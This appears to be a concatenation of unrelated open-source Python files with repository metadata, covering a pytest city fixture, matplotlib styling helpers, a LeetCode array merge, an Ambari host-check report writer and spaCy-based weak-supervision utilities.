"MIT"
] | null | null | null |
from typing import Generator, List
import pytest
from .cities import City
@pytest.fixture
def cities() -> Generator[List[City], None, None]:
cities = [
City(name='Villahermosa', state='Tabasco'),
City(name='Ciudad de México', state='CDMX'),
City(name='Monterrey', state='Nuevo León'),
City(name='San Cristobal', state='Chiapas'),
City(name='Tuxtla Gutiérrez', state='Chiapas'),
]
for city in cities:
city.save()
yield cities
for city in cities:
city.delete()
| 24.5
| 55
| 0.619666
|
794e3d0856c04f5110ffff67644f1b8c3a137c1c
| 1,609
|
py
|
Python
|
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | 2
|
2019-05-17T19:36:11.000Z
|
2022-03-07T08:34:21.000Z
|
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | null | null | null |
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | 1
|
2022-03-07T08:34:22.000Z
|
2022-03-07T08:34:22.000Z
|
"""
Loads my matplotlibrc file and allows me to customize
additional aspects of my plots
"""
import os
from warnings import warn
import matplotlib as mpl
import matplotlib.pyplot as plt
_path = os.path.dirname(os.path.abspath(__file__))
mpl.rc_context(fname=_path + "/matplotlibrc")
def change_style(society="utopia"):
"""
Loads other fonts based on the professional society
Parameters
----------
society : str
the name of the society
"""
if society == "ams":
font = "\usepackage{mathptmx},"
elif society == "agu":
font = "\usepackage[helvet]{sfmath},"
elif society == "utopia":
font = "\usepackage[adobe-utopia]{mathdesign},"
else:
warn("Style for society {society} not found. Using Computer Modern")
font = ''
with open(_path + "/preamble.txt", "r") as preamble:
mpl.rcParams['text.latex.preamble'] = preamble.read().format(font=font)
def pc2in(picas):
"""
Converts picas to inches
Parameters
----------
picas : int or float
dimension in picas
Returns
-------
inches : float
dimensions in inches
"""
if picas not in [19, 27, 33, 39, 68]:
warn("Not a standard AMS width")
return picas / 6.
def fix_ticklabels():
"""
Sets tick label typeface back to default while
preserving the default behavior of the major
label formatter
"""
for attr in ["xaxis", "yaxis"]:
fmt = getattr(plt.gca(), attr).get_major_formatter()
fmt._usetex = False
getattr(plt.gca(), attr).set_major_formatter(fmt)
| 25.140625
| 79
| 0.620883
|
794e3ff805ff4ab237c24e7c1ac354053dabd05d
| 1,149
|
py
|
Python
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 16
|
2021-10-02T20:10:51.000Z
|
2022-03-06T10:31:11.000Z
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 55
|
2021-10-02T07:31:41.000Z
|
2021-10-30T06:19:26.000Z
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 36
|
2021-10-02T18:00:08.000Z
|
2022-01-03T18:50:35.000Z
|
# https://leetcode.com/problems/merge-sorted-array/
class Solution(object):
def merge(self, nums1, m, nums2, n):
"""
:type nums1: List[int]
:type m: int
:type nums2: List[int]
:type n: int
:rtype: None Do not return anything, modify nums1 in-place instead.
"""
# pointer 1 = m - 1
# pointer 2 = n - 1
last = m + n - 1
# Since both arrays are sorted , check if last ele of nums2 is greater than nums1
# If yes, then nums2's last ele will be the last ele of nums1
# Else , it means that nums1's last non zero ele is the largest ele possible so it goes to last
# Decreament the pointers and last accordingly
while(m and n):
if(nums1[m-1] < nums2[n-1]):
nums1[last] = nums2[n-1]
n -= 1
else:
nums1[last] = nums1[m-1]
m -= 1
last -= 1
# If any elements are left in nums2 , append them in nums1
while(n):
nums1[last] = nums2[n-1]
n -= 1
last -= 1
| 35.90625
| 104
| 0.499565
|
794e427802e0cd8d960c3515953aa1a305794516
| 5,572
|
py
|
Python
|
ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import datetime
import os.path
import logging
import traceback
from AmbariConfig import AmbariConfig
import ConfigParser;
logger = logging.getLogger(__name__)
class HostCheckReportFileHandler:
HOST_CHECK_FILE = "hostcheck.result"
HOST_CHECK_CUSTOM_ACTIONS_FILE = "hostcheck_custom_actions.result"
def __init__(self, config=None):
self.hostCheckFilePath = None
if config is None:
config = self.resolve_ambari_config()
hostCheckFileDir = config.get('agent', 'prefix')
self.hostCheckFilePath = os.path.join(hostCheckFileDir, self.HOST_CHECK_FILE)
self.hostCheckCustomActionsFilePath = os.path.join(hostCheckFileDir, self.HOST_CHECK_CUSTOM_ACTIONS_FILE)
def resolve_ambari_config(self):
try:
config = AmbariConfig()
if os.path.exists(AmbariConfig.getConfigFile()):
config.read(AmbariConfig.getConfigFile())
else:
raise Exception("No config found, use default")
except Exception, err:
logger.warn(err)
return config
def writeHostChecksCustomActionsFile(self, structuredOutput):
if self.hostCheckCustomActionsFilePath is None:
return
try:
logger.info("Host check custom action report at " + self.hostCheckCustomActionsFilePath)
config = ConfigParser.RawConfigParser()
config.add_section('metadata')
config.set('metadata', 'created', str(datetime.datetime.now()))
if 'installed_packages' in structuredOutput.keys():
items = []
for itemDetail in structuredOutput['installed_packages']:
items.append(itemDetail['name'])
config.add_section('packages')
config.set('packages', 'pkg_list', ','.join(map(str, items)))
if 'existing_repos' in structuredOutput.keys():
config.add_section('repositories')
config.set('repositories', 'repo_list', ','.join(structuredOutput['existing_repos']))
self.removeFile(self.hostCheckCustomActionsFilePath)
self.touchFile(self.hostCheckCustomActionsFilePath)
with open(self.hostCheckCustomActionsFilePath, 'wb') as configfile:
config.write(configfile)
except Exception, err:
logger.error("Can't write host check file at %s :%s " % (self.hostCheckCustomActionsFilePath, err.message))
traceback.print_exc()
def writeHostCheckFile(self, hostInfo):
if self.hostCheckFilePath is None:
return
try:
logger.debug("Host check report at " + self.hostCheckFilePath)
config = ConfigParser.RawConfigParser()
config.add_section('metadata')
config.set('metadata', 'created', str(datetime.datetime.now()))
if 'existingUsers' in hostInfo.keys():
items = []
items2 = []
for itemDetail in hostInfo['existingUsers']:
items.append(itemDetail['name'])
items2.append(itemDetail['homeDir'])
config.add_section('users')
config.set('users', 'usr_list', ','.join(items))
config.set('users', 'usr_homedir_list', ','.join(items2))
if 'alternatives' in hostInfo.keys():
items = []
items2 = []
for itemDetail in hostInfo['alternatives']:
items.append(itemDetail['name'])
items2.append(itemDetail['target'])
config.add_section('alternatives')
config.set('alternatives', 'symlink_list', ','.join(items))
config.set('alternatives', 'target_list', ','.join(items2))
if 'stackFoldersAndFiles' in hostInfo.keys():
items = []
for itemDetail in hostInfo['stackFoldersAndFiles']:
items.append(itemDetail['name'])
if os.path.exists('/usr/hdp'):
items.append('/usr/hdp')
config.add_section('directories')
config.set('directories', 'dir_list', ','.join(items))
if 'hostHealth' in hostInfo.keys():
if 'activeJavaProcs' in hostInfo['hostHealth'].keys():
items = []
for itemDetail in hostInfo['hostHealth']['activeJavaProcs']:
items.append(itemDetail['pid'])
config.add_section('processes')
config.set('processes', 'proc_list', ','.join(map(str, items)))
self.removeFile(self.hostCheckFilePath)
self.touchFile(self.hostCheckFilePath)
with open(self.hostCheckFilePath, 'wb') as configfile:
config.write(configfile)
except Exception, err:
logger.error("Can't write host check file at %s :%s " % (self.hostCheckFilePath, err.message))
traceback.print_exc()
def removeFile(self, path):
if os.path.isfile(path):
logger.debug("Removing old host check file at %s" % path)
os.remove(path)
def touchFile(self, path):
if not os.path.isfile(path):
logger.debug("Creating host check file at %s" % path)
open(path, 'w').close()
| 36.657895
| 113
| 0.681981
|
794e44290f9e092e01df3fa24f59906f319aec35
| 264
|
py
|
Python
|
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
from sys import argv
# read the WYSS section for how to run this
script, first, second, third = argv
print("The script is called:", script)
print("Your first variable is:", first)
print("Your second variable is:", second)
print("Your third variable is:", third)
| 29.333333
| 43
| 0.731061
|
794e45aade7a6d16460934c64e28bb3e6e48c275
| 297
|
py
|
Python
|
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
"""
Exporter of pyhMSA data to TIFF images.
"""
__author__ = "Philippe T. Pinard"
__email__ = "philippe.pinard@gmail.com"
__copyright__ = "Copyright (c) 2013-2015 Philippe T. Pinard"
__license__ = "MIT"
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 22.846154
| 60
| 0.750842
|
794e45c19b797eba9dec4876a0be74c2dcbaed05
| 26,964
|
py
|
Python
|
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
import json
import re
import functools
from typing import List, Dict, Tuple, Optional, TypeVar, Iterable
from spacy.tokens import Doc, Token, Span, DocBin # type: ignore
import numpy as np
T = TypeVar('T')
############################################
# Utility functions for NLP analysis
############################################
def is_likely_proper(tok: Token, min_rank=200) -> bool:
"""Returns true if the spacy token is a likely proper name, based on its form.
NB: this method should only be used for languages that have a distinction between
lowercase and uppercase (so called bicameral scripts)."""
# We require at least two characters
if len(tok) < 2:
return False
# If the lemma is titled or in uppercase, just return True
elif tok.lemma_.istitle() and len(tok.lemma_) >2:
return True
elif tok.lemma_.isupper() and len(tok.lemma_) >2 and tok.lemma_ != "-PRON-":
return True
# If there is no lemma, but the token is in uppercase, return true as well
elif tok.lemma_=="" and tok.is_upper:
return True
# We do not consider the 200 most common words as proper name
elif (tok.lemma_.islower() and tok.lemma in tok.vocab.strings
and tok.vocab[tok.lemma].rank < min_rank):
return False
# Handling cases such as iPad
elif len(tok) > 2 and tok.text[0].islower() and tok.text[1].isupper():
return True
# Handling cases such as IceFog
elif (len(tok) > 2 and tok.text[0].isupper()
and any([k.islower() for k in tok.text[1:]])
and any([k.isupper() for k in tok.text[1:]])):
return True
# Else, check whether the surface token is titled and is not sentence-initial
# NB: This should be commented out for languages such as German
elif (tok.i > 0 and tok.is_title and not tok.is_sent_start
and tok.nbor(-1).text not in {'\'', '"', '‘', '“', '”', '’', "\n", "|"}
and not tok.nbor(-1).text.endswith(".")):
return True
# If the part-of-speech is a proper noun
elif tok.pos_ == "PROPN":
return True
# If the token is a quite rare token
elif (len(tok) > 3 and (tok.is_lower or tok.is_upper)
and len(tok.vocab.vectors) > 0 and tok.is_oov):
return True
return False
def is_infrequent(span: Span, max_rank_threshold=15000) -> bool:
"""Returns true if there is at least one token that is quite infrequent"""
max_rank = max(tok.rank if len(span.vocab.vectors) >
0 and tok.rank > 0 else 0 for tok in span)
return max_rank > max_rank_threshold
def in_compound(tok: Token):
"""Returns true if the spacy token is part of a compound phrase"""
if tok.dep_ == "compound":
return True
elif tok.i > 0 and tok.nbor(-1).dep_ == "compound":
return True
return False
def replace_ner_spans(doc: Doc, source: str):
"""Given a Spacy Doc object and the name of an annotation source, replaces
the current named entities by the ones specified in the source"""
# We create Spacy spans based on the annotation layer
spans = []
if source in doc.spans:
for span in doc.spans[source]:
spans.append(span)
doc.ents = tuple(spans)
return doc
@functools.lru_cache(maxsize=5)
def get_spacy_model(spacy_model_name: str):
"""Returns the vocabulary associated with the spacy model
(and caches it for faster access)"""
import spacy
return spacy.load(spacy_model_name)
@functools.lru_cache(maxsize=1)
def get_tokens(doc: Doc) -> List[str]:
"""Returns the list of tokens from a given spacy Document. As it is an
operation that (for some strange reason) actually takes some CPU resources,
we cache the results, as it is a frequent operation, e.g. for gazetteers. """
return [tok.text for tok in doc]
@functools.lru_cache(maxsize=1)
def get_next_sentence_boundaries(doc: Doc) -> List[int]:
"""Returns a list of integers (of same size as the number of tokens)
expressing, for each token, the position of the next sentence boundary
(start-of-sentence token). """
boundaries = []
for tok in doc:
if tok.is_sent_start:
boundaries.append(tok.i)
next_boundary_indices = np.searchsorted(boundaries, range(1, len(doc)+1))
next_boundaries = [boundaries[i] if i < len(boundaries) else len(doc)
for i in next_boundary_indices]
return next_boundaries
############################################
# I/O related functions
############################################
def docbin_reader(docbin_file_path: str, spacy_model_name: str = "en_core_web_md",
cutoff: Optional[int] = None, nb_to_skip: int = 0):
"""Read a binary file containing a DocBin repository of spacy documents.
In addition to the file path, we also need to provide the name of the spacy
model (which is necessary to load the vocabulary), such as "en_core_web_md".
If cutoff is specified, the method will stop after generating the given
number of documents. If nb_to_skip is > 0, the method will skip the given
number of documents before starting the generation.
"""
import spacy
# Reading the binary data from the file
fd = open(docbin_file_path, "rb")
data = fd.read()
fd.close()
docbin = DocBin(store_user_data=True)
docbin.from_bytes(data)
del data
# print("Total number of documents in docbin:", len(docbin))
# Skip a number of documents
if nb_to_skip:
docbin.tokens = docbin.tokens[nb_to_skip:]
docbin.spaces = docbin.spaces[nb_to_skip:]
docbin.user_data = docbin.user_data[nb_to_skip:]
# Retrieves the vocabulary
vocab = get_spacy_model(spacy_model_name).vocab
# We finally generate the documents one by one
reader = docbin.get_docs(vocab)
for i, doc in enumerate(reader):
yield doc
if cutoff is not None and (i+1) >= cutoff:
return
def docbin_writer(docs: Iterable[Doc], docbin_output_path: str):
"""Writes a stream of Spacy Doc objects to a binary file in the DocBin format."""
import spacy.attrs
# Creating the DocBin object (with all attributes)
attrs = [spacy.attrs.LEMMA, spacy.attrs.TAG, spacy.attrs.DEP, spacy.attrs.HEAD,
spacy.attrs.ENT_IOB, spacy.attrs.ENT_TYPE]
docbin = DocBin(attrs=attrs, store_user_data=True)
# Storing the documents in the DocBin repository
for doc in docs:
doc.cats = {}
docbin.add(doc)
data = docbin.to_bytes()
# And writing the content to the file
print("Write to", docbin_output_path, end="...", flush=True)
fd = open(docbin_output_path, "wb")
fd.write(data)
fd.close()
print("done")
def json_writer(docs, json_file_path: str, source: str = None):
"""Converts a collection of Spacy Doc objects to a JSON format,
such that it can be used to train the Spacy NER model. (for Spacy v2)
Source must be an aggregated source (defined in user_data["agg_spans"]), which
will correspond to the target values in the JSON file.
"""
import spacy
if int(spacy.__version__[0]) > 2:
raise RuntimeError("Only supported for Spacy v2")
import spacy.gold # type: ignore
# We start opening up the JSON file
print("Writing JSON file to", json_file_path)
out_fd = open(json_file_path, "wt")
out_fd.write("[{\"id\": 0, \"paragraphs\": [\n")
for i, doc in enumerate(docs):
# We replace the NER labels with the annotation source
if source is not None:
doc = replace_ner_spans(doc, source)
# We dump the JSON content to the file
d = spacy.gold.docs_to_json([doc])
s = json.dumps(d["paragraphs"]).strip("[]")
if i > 0:
s = ",\n" + s
out_fd.write(s)
if i > 0 and i % 1000 == 0:
print("Converted documents:", i)
out_fd.flush()
# And finally close all file descriptors
out_fd.write("]}]\n")
out_fd.flush()
out_fd.close()
############################################
# Operations on spans
############################################
def get_spans(doc: Doc, sources: List[str], labels: Optional[List[str]] = None
) -> List[Span]:
"""Return the spans annotated by a list of labelling sources. If two
spans are overlapping, the longest spans are kept. One can also specify the
labels to focus on (if empty, we extract all). """
# Creating a list of spans
spans = []
for source in sources:
if source in doc.spans:
for span in doc.spans[source]:
if labels is None or span.label_ in labels:
spans.append(span)
else:
raise RuntimeError("Annotation source \"%s\" cannot be found" % source)
# Remove possible overlaps
spans = _remove_overlaps(spans)
return spans
def get_spans_with_probs(doc: Doc, source: str, labels: Optional[List[str]] = None
) -> List[Tuple[Span,float]]:
"""Return the spans annotated by an aggregated source. The method returns a
dictionary of non-overlapping spans where the keys
are (start, end) pairs and the values are pairs of (label, prob).
"""
spans = []
if source in doc.spans:
for span in doc.spans[source]:
if labels is None or span.label_ in labels:
prob = _get_agg_span_prob(doc, source, span)
spans.append((span, prob))
else:
raise RuntimeError("Annotation source \"%s\" cannot be found" % source)
return spans
def _get_agg_span_prob(doc, source, span):
"""Get the probability that the source assigns the (start,end)->label span"""
if source not in doc.spans:
return 0
elif "probs" not in doc.spans[source].attrs:
return 1
probs = doc.spans[source].attrs["probs"]
if (span.start, span.end) in probs:
return probs[(span.start, span.end)]
probs_per_token = []
for i in range(span.start, span.end):
if i in probs:
for prefixed_label, prob in probs[i].items():
if prefixed_label.endswith("-%s" % span.label_):
probs_per_token.append(prob)
return sum(probs_per_token)/(len(span))
def count_nb_occurrences(tokens: Tuple[str, ...], all_tokens: List[str]):
"""Count the number of occurences of the sequence of tokens in the
full list all_tokens"""
nb_occurrences = 0
for i in range(len(all_tokens)):
for k in range(len(tokens)):
if all_tokens[i+k] != tokens[k]:
break
else:
nb_occurrences += 1
return nb_occurrences
def at_least_nb_occurrences(tokens: Tuple[str, ...], all_tokens: List[str], min_threshold):
"""Returns true if the number of occurences of the sequence of tokens in the
full list all_tokens is at least min_threshold, and false otherwise"""
if len(tokens) == 1:
return all_tokens.count(tokens[0]) >= min_threshold
nb_occurrences = 0
for i in range(len(all_tokens)):
for k in range(len(tokens)):
if (i+k) >= len(all_tokens) or all_tokens[i+k] != tokens[k]:
break
else:
nb_occurrences += 1
if nb_occurrences >= min_threshold:
return True
return False
def _remove_overlaps(spans: List[Span]) -> List[Span]:
"""Remove overlaps between spans expressed as (start, end, label, score)
tuples. When two overlapping spans are detected, the method keeps the
longest span and removes the other. If the two scores are identical,
the first span is discarded).
"""
# We sort the spans by their position
spans.sort()
# We resolve overlaps between spans
finished = False
while not finished:
finished = True
for i in range(1, len(spans)):
# If two spans are overlapping , keep the longest one
start1 = spans[i-1].start
end1 = spans[i-1].end
start2 = spans[i].start
end2 = spans[i].end
if start2 < end1 and start1 < end2:
length_diff = (end1-start1) - (end2-start2)
if length_diff > 0:
del spans[i]
else:
del spans[i-1]
finished = False
break
return spans
def merge_contiguous_spans(spans: List[Tuple[int, int, str]], doc: Doc,
acceptable_gaps: str = ","):
"""Merge spans that are contiguous (and with same label), or only
separated with some predefined punctuation symbols"""
finished = False
while not finished:
finished = True
spans.sort()
for i in range(1, len(spans)):
start1, end1, label1 = spans[i-1]
start2, end2, label2 = spans[i]
if end1 == start2 or (end1 == start2-1 and doc[end1].text in acceptable_gaps):
if label1 == label2:
new_spans = spans[:i-1] if i > 1 else []
new_spans.append((start1, end2, label1))
new_spans += spans[i+1:]
spans = new_spans
finished = False
break
return spans
def get_overlaps(start: int, end: int, other_spans: List[Tuple[int, int]]) -> List[Tuple[int, int]]:
"""Returns a list of overlaps (as (start, end, value) between the provided span
and other existing spans"""
overlaps = []
other_spans.sort()
start_search, end_search = _binary_search(start, end, other_spans)
for other_span_start, other_span_end in other_spans[start_search:end_search]:
if start < other_span_start and end > other_span_end:
overlaps.append((other_span_start, other_span_end))
return overlaps
def _binary_search(start: int, end: int, intervals: List[Tuple[int, int]]) -> Tuple[int, int]:
"""Performs a binary search"""
start_search = 0
end_search = len(intervals)
while start_search < (end_search-1):
mid = start_search + (end_search-start_search)//2
(interval_start, interval_end) = intervals[mid]
if interval_end <= start:
start_search = mid
elif interval_start >= end:
end_search = mid
else:
break
return start_search, end_search
def get_subsequences(sequence: List[T]) -> List[List[T]]:
"""Returns the list of possible subsequences that are included
in the full sequence (including the original sequence)."""
subsequences = []
for length in range(1, len(sequence)+1):
for i in range(length, len(sequence)+1):
subsequences.append(sequence[i-length:i])
return subsequences
def spans_to_array(doc: Doc, labels: List[str],
sources: List[str] = None) -> np.ndarray:
"""Convert the annotations of a spacy document into a 2D array.
Each row corresponds to a token, and each column to a labelling
source. In other words, the value at (i,j) represents the prediction
of source j for token i. This prediction is expressed as the
index of the label in the labels.
Labels must be a list of labels (such as B-PERSON, I-ORG) to detect.
Sources should be a list of labelling sources. If empty, all sources
are employed.
NB: we assume the labels use either IO/BIO/BILUO, and that the
O label is at position 0.
"""
# Creating some helper dictionaries
label_indices = {}
prefixes = set()
labels_without_prefix = set()
for i, label in enumerate(labels):
label_indices[label] = i
if "-" in label:
prefix, label = label.split("-", 1)
prefixes.add(prefix)
labels_without_prefix.add(label)
if sources is None:
sources = list(doc.spans.keys())
# Creating the numpy array itself
data = np.zeros((len(doc), len(sources)), dtype=np.int16)
for source_index, source in enumerate(sources):
for span in doc.spans.get(source, []):
if span.label_ not in labels_without_prefix:
continue
# If the span is a single token, we can use U
if "U" in prefixes and len(span) == 1:
data[span.start, source_index] = label_indices["U-%s" % span.label_]
continue
# Otherwise, we use B, I and L
if "B" in prefixes:
data[span.start, source_index] = label_indices["B-%s" % span.label_]
if "I" in prefixes:
start_i = (span.start+1) if "B" in prefixes else span.start
end_i = (span.end-1) if "L" in prefixes else span.end
data[start_i:end_i, source_index] = label_indices["I-%s" % span.label_]
if "L" in prefixes:
data[span.end-1, source_index] = label_indices["L-%s" % span.label_]
return data
def token_array_to_spans(agg_array: np.ndarray,
prefix_labels: List[str]) -> Dict[Tuple[int, int], str]:
"""Returns an dictionary of spans corresponding to the aggregated 2D
array. prefix_labels must be list of prefix labels such as B-PERSON,
I-ORG etc., of same size as the number of columns in the array."""
spans = {}
i = 0
while i < len(agg_array):
if np.isscalar(agg_array[i]):
value_index = agg_array[i]
else: # If we have probabilities, select most likely label
value_index = agg_array[i].argmax()
if value_index == 0:
i += 1
continue
prefix_label = prefix_labels[value_index]
prefix, label = prefix_label.split("-", 1)
# If the prefix is "U", create a single-token span
if prefix == "U":
spans[(i, i+1)] = label
i += 1
# Otherwise, we need to continue until the span ends
elif prefix in {"B", "I"}:
start = i
i += 1
while i < len(agg_array):
if np.isscalar(agg_array[i]):
next_val = agg_array[i]
else:
next_val = agg_array[i].argmax()
if next_val == 0:
break
next_prefix_label = prefix_labels[next_val]
next_prefix, next_label = next_prefix_label.split("-", 1)
if next_prefix not in {"I", "L"}:
break
i += 1
spans[(start, i)] = label
return spans
def token_array_to_probs(agg_array: np.ndarray,
prefix_labels: List[str]) -> Dict[int, Dict[str, float]]:
"""Given a 2D array containing, for each token, the probabilities for a
each possible output label in prefix form (B-PERSON, I-ORG, etc.), returns
a dictionary of dictionaries mapping token indices to probability distributions
over their possible labels. The "O" label and labels with zero probabilities
are ignored.
"""
# Initialising the label sequence
token_probs = {}
# We only look at labels beyond "O", and with non-zero probability
row_indices, col_indices = np.nonzero(agg_array[:, 1:])
for i, j in zip(row_indices, col_indices):
if i not in token_probs:
token_probs[i] = {prefix_labels[j+1]: agg_array[i, j+1]} #type: ignore
else:
token_probs[i][prefix_labels[j+1]] = agg_array[i, j+1] #type: ignore
return token_probs
def is_valid_start(prefix_label, encoding="BIO"):
"""Returns whether the prefix label is allowed to start a sequence"""
return (prefix_label == "O"
or prefix_label.startswith("B-")
or prefix_label.startswith("U-") or
(prefix_label.startswith("I-") and "B" not in encoding))
def is_valid_transition(prefix_label1, prefix_label2, encoding="BIO"):
"""Returns whether the two labels (associated with a prefix, such as B-PERSON,
I-ORG etc.) are allowed to follow one another according to the encoding (which
can be BIO, BILUO, IO, etc.)"""
if prefix_label1.startswith("B-"):
if ((prefix_label2.startswith("I-")
or prefix_label2.startswith("L-"))
and prefix_label1[2:] == prefix_label2[2:]):
return True
elif "U" not in encoding:
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
elif prefix_label1.startswith("I-"):
if ((prefix_label2.startswith("I-")
or prefix_label2.startswith("L-"))
and prefix_label1[2:] == prefix_label2[2:]):
return True
elif "L" not in encoding:
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
elif prefix_label1 == "O" or prefix_label1.startswith("L-") or prefix_label1.startswith("U-"):
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
############################################
# Visualisation
############################################
def display_entities(doc: Doc, layer=None, add_tooltip=False):
"""Display the entities annotated in a spacy document, based on the
provided annotation layer(s). If layer is None, the method displays
the entities from Spacy.
This method will only work in a Jupyter Notebook or similar.
If add_tooltip is set to True, the visualisation also adds tooltips to show
the predictions of each labelling functions for a given token. This functionality
only works with Jupyter Lab (not Jupyter Notebook).
"""
import spacy.displacy
import IPython.core.display
if layer is None:
spans = doc.ents
elif type(layer) is list:
spans = get_spans(doc, layer)
elif type(layer) == str:
if "*" in layer:
matched_layers = [l for l in doc.spans
if re.match(layer.replace("*", ".*?")+"$", l)]
spans = get_spans(doc, matched_layers)
else:
spans = doc.spans[layer]
else:
raise RuntimeError("Layer type not accepted")
entities = {}
for span in spans:
start_char = doc[span.start].idx
end_char = doc[span.end-1].idx + len(doc[span.end-1])
if (start_char, end_char) not in entities:
entities[(start_char, end_char)] = span.label_
# If we have several alternative labels for a span, join them with +
elif span.label_ not in entities[(start_char, end_char)]:
entities[(start_char, end_char)] = entities[(
start_char, end_char)] + "+" + span.label_
entities = [{"start": start, "end": end, "label": label}
for (start, end), label in entities.items()]
doc2 = {"text": doc.text, "title": None, "ents": entities}
html = spacy.displacy.render(doc2, jupyter=False, style="ent", manual=True)
if add_tooltip and type(layer)==str and "sources" in doc.spans[layer].attrs:
html = _enrich_with_tooltip(doc, html, doc.spans[layer].attrs["sources"]) # type: ignore
ipython_html = IPython.core.display.HTML(
'<span class="tex2jax_ignore">{}</span>'.format(html))
return IPython.core.display.display(ipython_html)
def _enrich_with_tooltip(doc: Doc, html: str, sources: List[str]):
"""Enrich the HTML produced by spacy with tooltips displaying the predictions
of each labelling function"""
import spacy.util
if len(doc.spans)==0:
return html
# Retrieves annotations for each token
annotations_by_tok = {}
for source in sources:
for span in doc.spans[source]:
for i in range(span.start, span.end):
annotations_by_tok[i] = annotations_by_tok.get(i, []) + [(source, span.label_)]
# We determine which characters are part of the HTML markup and not the text
all_chars_to_skip = set()
for fragment in re.finditer("<span.+?</span>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
for fragment in re.finditer("</?div.*?>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
for fragment in re.finditer("</?mark.*?>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
# We loop on each token
curr_pos = 0
new_fragments = []
for tok in doc:
# We search for the token position in the HTML
toktext = spacy.util.escape_html(tok.text)
if "\n" in toktext:
continue
start_pos = html.index(toktext, curr_pos)
if start_pos == -1:
raise RuntimeError("could not find", tok)
while any((i in all_chars_to_skip for i in range(start_pos, start_pos + len(toktext)))):
start_pos = html.index(toktext, start_pos+1)
if start_pos == -1:
raise RuntimeError("could not find", tok)
# We add the preceding fragment
new_fragments.append(html[curr_pos:start_pos])
# If the token has annotations, we create a tooltip
if tok.i in annotations_by_tok:
lines = ["%s:\t%s  " %
(ann, label) for ann, label in annotations_by_tok[tok.i]]
max_width = 7*max([len(l) for l in lines])
new_fragment = ("<label class='tooltip'>%s" % toktext +
"<span class='tooltip-text' style='width:%ipx'>"%max_width +
"%s</span></label>" %"<br>".join(lines))
else:
new_fragment = toktext
new_fragments.append(new_fragment)
curr_pos = start_pos + len(toktext)
new_fragments.append(html[curr_pos:])
new_html = """<style>
.tooltip { position: relative; border-bottom: 1px dotted black; }
.tooltip .tooltip-text {visibility: hidden; background-color: black; color: white;
line-height: 1.2; text-align: right; border-radius: 6px;
padding: 5px 0; position: absolute; z-index: 1; margin-left:1em;
opacity: 0; transition: opacity 1s;}
.tooltip .tooltip-text::after {position: absolute; top: 1.5em; right: 100%; margin-top: -5px;
border-width: 5px; border-style: solid;
border-color: transparent black transparent transparent;}
.tooltip:hover .tooltip-text {visibility: visible; opacity: 1;}
</style>
""" + "".join(new_fragments)
return new_html
| 36.339623
| 100
| 0.608812
|
